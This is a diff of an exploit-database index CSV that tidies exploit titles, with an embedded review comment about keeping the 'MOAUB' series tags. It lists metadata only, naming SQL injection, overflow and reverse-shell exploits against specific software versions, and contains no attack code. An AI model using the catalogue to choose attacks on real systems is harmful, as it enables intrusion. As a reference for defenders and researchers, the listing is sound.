+15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Bypass Authentication by SQL Injection Vulnerability",2010-09-28,Abysssec,php,webapps,0
 15143,platforms/php/webapps/15143.txt,"e107 0.7.23 - SQL Injection Vulnerability.",2010-09-28,"High-Tech Bridge SA",php,webapps,0
 15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure (SQLi) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0
 15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorization Flaws",2010-09-28,"Pablo Milano",php,webapps,0
 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF Vulnerability",2010-09-28,"Pablo Milano",php,webapps,0
 15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent XSS Vulnerability",2010-09-28,"SecPod Research",php,webapps,0
-15148,platforms/windows/dos/15148.txt,"MOAUB #29 - Microsoft Excel SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0
+15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0
 15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure",2010-09-29,"Jon Oberheide",linux,local,0
 15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection Vulnerability",2010-09-29,"silent vapor",php,webapps,0
 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Vulnerability",2010-09-29,"Easy Laster",php,webapps,0
@@ -13159,8 +13154,8 @@ id,file,description,date,author,platform,type,port
 15155,platforms/linux/local/15155.c,"XFS Deleted Inode Local Information Disclosure Vulnerability",2010-09-29,"Red Hat",linux,local,0
 15156,platforms/windows/local/15156.py,"Quick Player 1.3 Unicode SEH Exploit",2010-09-29,"Abhishek Lyall",windows,local,0
 15157,platforms/php/webapps/15157.txt,"je guestbook 1.0 joomla component Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0
-15158,platforms/windows/dos/15158.py,"MOAUB #30 - Microsoft Unicode Scripts Processor Remote Code Execution",2010-09-30,Abysssec,windows,dos,0
-15160,platforms/asp/webapps/15160.txt,"MOAUB #30 - ASPMass Shopping Cart Vulnerability File Upload CSRF",2010-09-30,Abysssec,asp,webapps,0
+15158,platforms/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution",2010-09-30,Abysssec,windows,dos,0
+15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Vulnerability File Upload CSRF",2010-09-30,Abysssec,asp,webapps,0
 15162,platforms/php/webapps/15162.rb,"Joomla JE Job Component SQL injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0
 15163,platforms/php/webapps/15163.rb,"Joomla JE Directory Component SQL Injection Vulnerability",2010-09-30,"Easy Laster",php,webapps,0
 15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 Shell Upload Vulnerability",2010-09-30,"Jeff Channell",php,webapps,0
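Review bot: Dropping the `MOAUB #28` / `MOAUB #29` prefix from the 15139, 15141 and 15148 descriptions removes the only text that ties these entries to the Abysssec series, since this CSV has no column for such a tag and the prefix is not carried anywhere else in the row. If the prefix is unwanted at the head of the title, keeping it as a trailing qualifier, e.g. `"AtomatiCMS - Upload Arbitrary File Vulnerability (MOAUB #28)"`, would keep the entries findable by series name. The hunk ending on this line (15158, 15160) and the hunk that begins before this chunk (15104 through 15124) make the same change.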
@@ -13371,7 +13366,7 @@ id,file,description,date,author,platform,type,port
 15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit",2010-11-05,wingthor,windows,dos,0
 15423,platforms/android/remote/15423.html,"Android 2.0-2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0
 15426,platforms/windows/dos/15426.txt,"Adobe Flash ActionIf Integer Denial of Service Vulnerability",2010-11-05,"Matthew Bergin",windows,dos,0
-15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - (0day) Remote Directory Traversal Vulnerability",2010-11-05,"Yakir Wizman",windows,remote,0
+15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Remote Directory Traversal Vulnerability (0day)",2010-11-05,"Yakir Wizman",windows,remote,0
 15428,platforms/multiple/dos/15428.rb,"Avidemux <= 2.5.4 - Buffer Overflow Vulnerability",2010-11-05,The_UnKn@wn,multiple,dos,0
 15429,platforms/windows/dos/15429.txt,"FileFuzz Denial of Service vulnerability",2010-11-05,Sweet,windows,dos,0
 15430,platforms/php/webapps/15430.txt,"Joomla ccInvoices Component (com_ccinvoices) SQL Injection Vulnerability",2010-11-05,FL0RiX,php,webapps,0
@@ -13761,7 +13756,7 @@ id,file,description,date,author,platform,type,port
 15892,platforms/php/webapps/15892.html,"YourTube 1.0 - CSRF Vulnerability (Add User)",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0
 15893,platforms/php/webapps/15893.py,"amoeba cms 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,php,webapps,0
 15894,platforms/windows/dos/15894.c,"MS10-073 Windows Class Handling Vulnerability",2011-01-02,"Tarjei Mandt",windows,dos,0
-15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 DEP Bypass",2011-01-02,blake,windows,local,0
+15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0
 15896,platforms/php/webapps/15896.txt,"Sahana Agasti <= 0.6.4 - Multiple Remote File Inclusion",2011-01-03,n0n0x,php,webapps,0
 15897,platforms/windows/dos/15897.py,"Music Animation Machine MIDI Player Local Crash PoC",2011-01-03,c0d3R'Z,windows,dos,0
 15898,platforms/multiple/dos/15898.py,"Wireshark ENTTEC DMX Data RLE Buffer Overflow Vulnerability",2011-01-03,"non-customers crew",multiple,dos,0
@@ -13889,7 +13884,7 @@ id,file,description,date,author,platform,type,port
 16075,platforms/windows/remote/16075.pl,"Caedo HTTPd Server 0.5.1 ALPHA - Remote File Download",2011-01-29,"Zer0 Thunder",windows,remote,0
 16076,platforms/php/webapps/16076.txt,"vBSEO 3.5.2 & 3.2.2 - Persistent XSS via LinkBacks",2011-01-30,MaXe,php,webapps,0
 16077,platforms/php/webapps/16077.txt,"vBSEO Sitemap 2.5 & 3.0 - Multiple Vulnerabilities",2011-01-30,MaXe,php,webapps,0
-16078,platforms/windows/remote/16078.py,"SDP Downloader 2.3.0 (http_response) Remote Buffer Overflow Exploit",2011-01-30,sup3r,windows,remote,0
+16078,platforms/windows/remote/16078.py,"SDP Downloader 2.3.0 - (http_response) Remote Buffer Overflow Exploit",2011-01-30,sup3r,windows,remote,0
 16079,platforms/multiple/dos/16079.html,"Google Chrome 8.0.552.237 - .replace DoS",2011-01-30,"Carlos Mario Penagos Hollmann",multiple,dos,0
 16080,platforms/php/webapps/16080.txt,"RW-Download 4.0.6 - (index.php) SQL Injection Vulnerability",2011-01-30,Dr.NeT,php,webapps,0
 16083,platforms/windows/local/16083.rb,"NetZip Classic Buffer Overflow Exploit (SEH)",2011-01-30,"C4SS!0 G0M3S",windows,local,0
@@ -14172,7 +14167,7 @@ id,file,description,date,author,platform,type,port
 16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",2011-02-08,metasploit,windows,remote,0
 16397,platforms/windows/remote/16397.rb,"Lyris ListManager MSDE Weak sa Password",2010-09-20,metasploit,windows,remote,0
 16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server Hello Overflow",2010-04-30,metasploit,windows,remote,0
-16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail 5.5 POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0
+16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0
 16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",2010-05-09,metasploit,windows,remote,0
 16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve Message Engine Heap Overflow",2010-04-30,metasploit,windows,remote,0
 16402,platforms/windows/remote/16402.rb,"CA BrightStor HSM Buffer Overflow",2010-05-09,metasploit,windows,remote,0
@@ -14204,7 +14199,7 @@ id,file,description,date,author,platform,type,port
 16428,platforms/windows/remote/16428.rb,"IBM Tivoli Storage Manager Express RCA Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0
 16429,platforms/windows/remote/16429.rb,"HP OpenView Operations OVTrace Buffer Overflow",2010-06-22,metasploit,windows,remote,0
 16430,platforms/windows/remote/16430.rb,"BigAnt Server 2.2 - Buffer Overflow",2010-05-09,metasploit,windows,remote,0
-16431,platforms/windows/remote/16431.rb,"BigAnt Server 2.50 SP1 Buffer Overflow",2010-07-03,metasploit,windows,remote,0
+16431,platforms/windows/remote/16431.rb,"BigAnt Server 2.50 SP1 - Buffer Overflow",2010-07-03,metasploit,windows,remote,0
 16432,platforms/windows/remote/16432.rb,"Firebird Relational Database isc_create_database() Buffer Overflow",2010-07-03,metasploit,windows,remote,0
 16433,platforms/windows/remote/16433.rb,"Bomberclone 0.11.6 - Buffer Overflow",2010-04-30,metasploit,windows,remote,0
 16434,platforms/windows/remote/16434.rb,"Borland CaliberRM StarTeam Multicast Service Buffer Overflow",2010-06-15,metasploit,windows,remote,0
@@ -14366,7 +14361,7 @@ id,file,description,date,author,platform,type,port
 16590,platforms/windows/remote/16590.rb,"Internet Explorer DHTML Behaviors Use After Free",2010-12-14,metasploit,windows,remote,0
 16591,platforms/windows/remote/16591.rb,"AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow",2010-04-30,metasploit,windows,remote,0
 16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
-16593,platforms/windows/local/16593.rb,"Adobe JBIG2Decode Memory Corruption Exploit",2010-06-15,metasploit,windows,local,0
+16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption Exploit",2010-06-15,metasploit,windows,local,0
 16594,platforms/windows/remote/16594.rb,"Adobe Shockwave rcsL Memory Corruption",2010-10-22,metasploit,windows,remote,0
 16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
 16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution",2010-10-04,metasploit,windows,remote,0
@@ -14397,7 +14392,7 @@ id,file,description,date,author,platform,type,port
 16621,platforms/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0
 16622,platforms/windows/local/16622.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",2010-09-25,metasploit,windows,local,0
 16623,platforms/windows/local/16623.rb,"Adobe Doc.media.newPlayer Use After Free Vulnerability",2010-09-25,metasploit,windows,local,0
-16624,platforms/windows/local/16624.rb,"Adobe util.printf() Buffer Overflow",2010-09-25,metasploit,windows,local,0
+16624,platforms/windows/local/16624.rb,"Adobe util.printf() Buffer Overflow (2)",2010-09-25,metasploit,windows,local,0
 16625,platforms/windows/local/16625.rb,"Microsoft Excel Malformed FEATHEADER Record Vulnerability",2010-09-25,metasploit,windows,local,0
 16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 (PLS File) Stack Buffer Overflow",2010-01-28,metasploit,windows,local,0
 16627,platforms/windows/local/16627.rb,"UltraISO CUE File Parsing Buffer Overflow",2010-04-30,metasploit,windows,local,0
@@ -14445,7 +14440,7 @@ id,file,description,date,author,platform,type,port
 16669,platforms/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow",2010-09-25,metasploit,windows,local,0
 16670,platforms/windows/local/16670.rb,"Adobe Acrobat Bundled LibTIFF Integer Overflow",2010-09-25,metasploit,windows,local,0
 16671,platforms/windows/local/16671.rb,"Adobe PDF Embedded EXE Social Engineering",2010-12-16,metasploit,windows,local,0
-16672,platforms/windows/local/16672.rb,"Adobe JBIG2Decode Memory Corruption Exploit",2010-09-25,metasploit,windows,local,0
+16672,platforms/windows/local/16672.rb,"Adobe - JBIG2Decode Memory Corruption Exploit (2)",2010-09-25,metasploit,windows,local,0
 16673,platforms/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Stack Buffer Overflow",2010-11-11,metasploit,windows,local,0
 16674,platforms/windows/local/16674.rb,"Adobe Collab.collectEmailInfo() Buffer Overflow",2010-09-25,metasploit,windows,local,0
 16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner (DBR File) Path Buffer Overflow",2010-09-20,metasploit,windows,local,0
@@ -14457,7 +14452,7 @@ id,file,description,date,author,platform,type,port
 16681,platforms/windows/local/16681.rb,"Adobe Collab.getIcon() Buffer Overflow",2010-09-25,metasploit,windows,local,0
 16682,platforms/windows/local/16682.rb,"Adobe PDF Escape EXE Social Engineering (No JavaScript)",2010-12-16,metasploit,windows,local,0
 16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit",2010-09-25,metasploit,windows,local,0
-16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 PLS M3U Buffer Overflow",2010-04-30,metasploit,windows,local,0
+16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .M3U Buffer Overflow",2010-04-30,metasploit,windows,local,0
 16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback ActiveX Control Buffer Overflow",2010-11-05,metasploit,windows,remote,0
 16686,platforms/windows/local/16686.rb,"Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)",2011-03-04,metasploit,windows,local,0
 16687,platforms/windows/local/16687.rb,"Adobe Flash Player ""newfunction"" Invalid Pointer Use",2010-09-25,metasploit,windows,local,0
@@ -14988,7 +14983,7 @@ id,file,description,date,author,platform,type,port
 17267,platforms/php/webapps/17267.txt,"Traidnt UP 2.0 - (view.php) SQL Injection Vulnerability",2011-05-10,ScOrPiOn,php,webapps,0
 17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 Content-Type Buffer Overflow",2011-05-11,metasploit,windows,remote,0
 17269,platforms/windows/remote/17269.rb,"ICONICS WebHMI ActiveX Buffer Overflow",2011-05-10,metasploit,windows,remote,0
-17270,platforms/windows/local/17270.pl,"Chasys Media Player 2.0 - Buffer Overflow Exploit(SEH)",2011-05-11,h1ch4m,windows,local,0
+17270,platforms/windows/local/17270.pl,"Chasys Media Player 2.0 - Buffer Overflow Exploit (SEH)",2011-05-11,h1ch4m,windows,local,0
 17273,platforms/windows/dos/17273.c,"Symantec Backup Exec System Recovery 8.5 - Kernel Pointers Dereferences 0day",2011-05-12,"Stefan LE BERRE",windows,dos,0
 17274,platforms/windows/dos/17274.txt,"SlimPDF Reader PoC",2011-05-12,"Nicolas Krassas",windows,dos,0
 17275,platforms/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 DEP Bypass",2011-05-12,h1ch4m,windows,local,0
@@ -16159,7 +16154,7 @@ id,file,description,date,author,platform,type,port
 18710,platforms/windows/local/18710.rb,"Csound hetro File Handling Stack Buffer Overflow",2012-04-06,metasploit,windows,local,0
 18711,platforms/php/webapps/18711.txt,"w-cms 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps,0
 18714,platforms/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console Remote Command Execution",2012-04-08,metasploit,windows,remote,0
-18715,platforms/multiple/webapps/18715.rb,"Liferay XSL Command Execution",2012-04-08,"Spencer McIntyre",multiple,webapps,0
+18715,platforms/multiple/webapps/18715.rb,"Liferay XSL - Command Execution",2012-04-08,"Spencer McIntyre",multiple,webapps,0
 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow Vulnerability",2012-04-08,Vulnerability-Lab,windows,dos,0
 18717,platforms/windows/dos/18717.txt,"AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0
 18718,platforms/windows/remote/18718.txt,"distinct tftp server <= 3.01 - Directory Traversal vulnerability",2012-04-08,modpr0be,windows,remote,0
@@ -16689,7 +16684,7 @@ id,file,description,date,author,platform,type,port
 19336,platforms/windows/dos/19336.txt,"XnView 1.98.8 PCT Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0
 19337,platforms/windows/dos/19337.txt,"XnView 1.98.8 TIFF Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0
 19338,platforms/windows/dos/19338.txt,"XnView 1.98.8 TIFF Image Processing Heap Overflow (2)",2012-06-22,"Francis Provencher",windows,dos,0
-19339,platforms/windows/webapps/19339.txt,"SoftPerfect Bandwidth Manager 2.9.10 Authentication Bypass",2012-06-22,Gitsnik,windows,webapps,0
+19339,platforms/windows/webapps/19339.txt,"SoftPerfect Bandwidth Manager 2.9.10 - Authentication Bypass",2012-06-22,Gitsnik,windows,webapps,0
 19340,platforms/windows/dos/19340.txt,"Lattice Diamond Programmer 1.4.2 - Buffer Overflow",2012-06-22,"Core Security",windows,dos,0
 19341,platforms/solaris/local/19341.c,"Solaris <= 2.5.1 kcms Buffer Overflow Vulnerability (1)",1998-12-24,"Cheez Whiz",solaris,local,0
 19342,platforms/solaris/local/19342.c,"Solaris <= 2.5.1 kcms Buffer Overflow Vulnerability (2)",1998-12-24,UNYUN,solaris,local,0
@@ -17625,8 +17620,8 @@ id,file,description,date,author,platform,type,port
 20321,platforms/windows/remote/20321.rb,"Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution",2012-08-08,metasploit,windows,remote,0
 20322,platforms/multiple/remote/20322.html,"Sun HotJava Browser 3 Arbitrary DOM Access Vulnerability",2000-10-25,"Georgi Guninski",multiple,remote,0
 20323,platforms/hardware/remote/20323.txt,"Cisco IOS 12 Software ""?/"" HTTP Request DoS Vulnerability",2000-10-25,"Alberto Solino",hardware,remote,0
-20324,platforms/windows/remote/20324.txt,"iplanet certificate management system 4.2 for windows nt 4.0 - Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0
-20325,platforms/windows/remote/20325.txt,"Netscape Directory Server 4.12 Directory Server Directory Traversal Vulnerability",2000-10-25,CORE-SDI,windows,remote,0
+20324,platforms/windows/remote/20324.txt,"iPlanet Certificate Management System 4.2 - Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0
+20325,platforms/windows/remote/20325.txt,"Netscape Directory Server 4.12 - Directory Server Directory Traversal Vulnerability",2000-10-25,CORE-SDI,windows,remote,0
 20326,platforms/unix/local/20326.sh,"ntop 1.x -i Local Format String Vulnerability",2000-10-18,"Paul Starzetz",unix,local,0
 20327,platforms/unix/remote/20327.txt,"GNU Ffingerd 1.19 Username Validity Disclosure Vulnerability",1999-08-23,"Eilon Gishri",unix,remote,0
 20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 Denial of Service Vulnerability",2000-10-20,"Knud Erik Højgaard",hardware,dos,0
@@ -17716,7 +17711,7 @@ id,file,description,date,author,platform,type,port
 20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0
 20414,platforms/unix/remote/20414.c,"Ethereal AFS Buffer Overflow Vulnerability",2000-11-18,mat,unix,remote,0
 20416,platforms/php/webapps/20416.txt,"WordPress Mz-jajak plugin <= 2.1 - SQL Injection Vulnerability",2012-08-10,StRoNiX,php,webapps,0
-20417,platforms/osx/local/20417.c,"Tunnelblick Local Root Exploit",2012-08-11,zx2c4,osx,local,0
+20417,platforms/osx/local/20417.c,"Tunnelblick - Local Root Exploit",2012-08-11,zx2c4,osx,local,0
 20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0
 20419,platforms/php/webapps/20419.txt,"Flynax General Classifieds 4.0 - CMS Multiple Vulnerabilities",2012-08-11,Vulnerability-Lab,php,webapps,0
 20421,platforms/php/webapps/20421.txt,"ProQuiz 2.0.2 - Multiple Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0
@@ -17741,7 +17736,7 @@ id,file,description,date,author,platform,type,port
 20440,platforms/windows/dos/20440.irc,"Windows 3.11/95/NT 4.0/NT 3.5.1 ""Out Of Band"" Data Denial of Service (4)",1997-05-07,"maddog and lerper",windows,dos,0
 20441,platforms/multiple/remote/20441.txt,"IBM Net.Data 7.0 Path Disclosure Vulnerability",2000-11-29,"Chad Kalmes",multiple,remote,0
 20442,platforms/cgi/remote/20442.html,"Greg Matthews Classifieds.cgi 1.0 Hidden Variable Vulnerability",1998-12-15,anonymous,cgi,remote,0
-20443,platforms/osx/local/20443.sh,"Tunnelblick Local Root Exploit #2",2012-08-11,zx2c4,osx,local,0
+20443,platforms/osx/local/20443.sh,"Tunnelblick - Local Root Exploit (2)",2012-08-11,zx2c4,osx,local,0
 20444,platforms/cgi/remote/20444.txt,"Greg Matthews Classifieds.cgi 1.0 Metacharacter Vulnerability",1998-12-15,anonymous,cgi,remote,0
 20445,platforms/windows/remote/20445.txt,"IIS 1.0,Netscape Server 1.0/1.12,OReilly WebSite Professional 1.1 b BAT/.CMD Remote Command Execution",1996-03-01,anonymous,windows,remote,0
 20446,platforms/cgi/remote/20446.txt,"WebCom datakommunikation Guestbook 0.1 wguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0
@@ -20227,7 +20222,7 @@ id,file,description,date,author,platform,type,port
 23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module PAGE_id Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0
 23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module PDA_limit Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0
 23018,platforms/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 Path Disclosure Vulnerability",2003-08-11,"Zone-h Security Team",php,webapps,0
-23019,platforms/windows/remote/23019.c,"Microsoft Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability",2003-08-11,root@networkpenetration.com,windows,remote,0
+23019,platforms/windows/remote/23019.c,"Microsoft Windows 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability",2003-08-11,root@networkpenetration.com,windows,remote,0
 23020,platforms/php/webapps/23020.txt,"HostAdmin 0 Path Disclosure Vulnerability",2003-08-12,G00db0y,php,webapps,0
 23021,platforms/cgi/webapps/23021.txt,"Eudora WorldMail 2.0 Search Cross-Site Scripting Vulnerability",2003-08-12,"Donnie Werner",cgi,webapps,0
 23022,platforms/php/local/23022.c,"PHP 4.x DLOpen Memory Disclosure Vulnerability (1)",2003-08-13,"Andrew Griffiths",php,local,0
@@ -20751,7 +20746,7 @@ id,file,description,date,author,platform,type,port
 23559,platforms/windows/remote/23559.txt,"WebTrends Reporting Center 6.1 Management Interface Path Disclosure Vulnerability",2004-01-20,"Oliver Karow",windows,remote,0
 23560,platforms/windows/remote/23560.txt,"anteco visual technologies ownserver 1.0 - Directory Traversal vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0
 23561,platforms/asp/webapps/23561.txt,"DUware Software Multiple Vulnerabilities",2004-01-20,"Security Corporation",asp,webapps,0
-23562,platforms/windows/remote/23562.html,"2Wire HomePortal Series Directory Traversal Vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0
+23562,platforms/windows/remote/23562.html,"2Wire HomePortal Series - Directory Traversal Vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0
 23563,platforms/multiple/remote/23563.txt,"Darkwet Network WebcamXP 1.6.945 Cross-Site Scripting Vulnerability",2004-01-21,"Rafel Ivgi The-Insider",multiple,remote,0
 23564,platforms/multiple/remote/23564.txt,"Mephistoles HTTPD 0.6 Cross-Site Scripting Vulnerability",2004-01-21,"Donato Ferrante",multiple,remote,0
 23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 (DownloadURLToFile()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0
@@ -20879,7 +20874,7 @@ id,file,description,date,author,platform,type,port
 23694,platforms/windows/remote/23694.rb,"RealPlayer RealMedia File Handling Buffer Overflow",2012-12-27,metasploit,windows,remote,0
 23695,platforms/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 ITS Protocol Zone Bypass Vulnerability",2004-02-13,anonymous,windows,remote,0
 23696,platforms/asp/webapps/23696.pl,"ASP Portal Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0
-23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
+23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
 23698,platforms/php/webapps/23698.txt,"AllMyVisitors 0.x info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
 23699,platforms/php/webapps/23699.txt,"AllMyLinks 0.x - footer.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
 23700,platforms/windows/remote/23700.txt,"ACLogic CesarFTP 0.99 Remote Resource Exhaustion Vulnerability",2004-02-16,"intuit e.b.",windows,remote,0
@@ -22345,7 +22340,7 @@ id,file,description,date,author,platform,type,port
 25235,platforms/php/webapps/25235.txt,"Subdreamer 1.0 - SQL Injection Vulnerability",2005-03-18,"GHC team",php,webapps,0
 25236,platforms/php/webapps/25236.html,"PHPOpenChat 3.0.1 - Multiple HTML Injection Vulnerabilities",2005-03-18,"PersianHacker Team",php,webapps,0
 25237,platforms/php/webapps/25237.txt,"RunCMS 1.1 Database Configuration Information Disclosure Vulnerability",2005-03-18,"Majid NT",php,webapps,0
-25238,platforms/multiple/remote/25238.txt,"Icecast 2.x XSL Parser Multiple Vulnerabilities",2005-03-18,patrick,multiple,remote,0
+25238,platforms/multiple/remote/25238.txt,"Icecast 2.x - XSL Parser Multiple Vulnerabilities",2005-03-18,patrick,multiple,remote,0
 25239,platforms/php/webapps/25239.txt,"CoolForum 0.5/0.7/0.8 avatar.php img Parameter XSS",2005-03-19,Romano,php,webapps,0
 25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 register.php login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0
 25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 Setuser.PHP HTML Injection Vulnerability",2005-03-19,"PersianHacker Team",php,webapps,0
@@ -22871,7 +22866,6 @@ id,file,description,date,author,platform,type,port
 25773,platforms/php/webapps/25773.txt,"Qualiteam X-Cart 4.0.8 search.php mode Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0
 25774,platforms/php/webapps/25774.txt,"Qualiteam X-Cart 4.0.8 giftcert.php Multiple Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0
 25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,metasploit,linux,remote,80
-25776,platforms/windows/local/25776.rb,"AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass",2013-05-28,metasploit,windows,local,0
 25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 IncDir Remote File Include Vulnerability",2005-05-31,"SoulBlack Group",php,webapps,0
 25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0
 25779,platforms/php/webapps/25779.txt,"MyBB Multiple Cross-Site Scripting and SQL Injection Vulnerabilities",2005-05-31,"Alberto Trivero",php,webapps,0
@@ -24270,7 +24264,7 @@ id,file,description,date,author,platform,type,port
 27207,platforms/php/webapps/27207.txt,"Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities",2006-02-13,"Aliaksandr Hartsuyeu",php,webapps,0
 27208,platforms/php/webapps/27208.txt,"PHPNuke 6.x/7.x Header.PHP Pagetitle Parameter Cross-Site Scripting Vulnerability",2006-02-13,"Janek Vind",php,webapps,0
 27209,platforms/php/webapps/27209.txt,"Gastebuch 1.3.2 Cross-Site Scripting Vulnerability",2006-02-13,"Micha Borrmann",php,webapps,0
-27210,platforms/multiple/dos/27210.txt,"eStara SoftPhone 3.0.1 SIP SDP Message Handling Format String DoS",2006-02-14,ZwelL,multiple,dos,0
+27210,platforms/multiple/dos/27210.txt,"eStara SoftPhone 3.0.1 - SIP SDP Message Handling Format String DoS",2006-02-14,ZwelL,multiple,dos,0
 27211,platforms/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet Multiple Malformed Field DoS",2006-02-14,ZwelL,multiple,dos,0
 27212,platforms/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 LDAP Memory Corruption Vulnerability",2006-02-14,"Evgeny Legerov",multiple,dos,0
 27213,platforms/php/webapps/27213.txt,"QwikiWiki 1.5 Search.PHP Cross-Site Scripting Vulnerability",2006-02-14,Citynova,php,webapps,0
@@ -24656,7 +24650,7 @@ id,file,description,date,author,platform,type,port
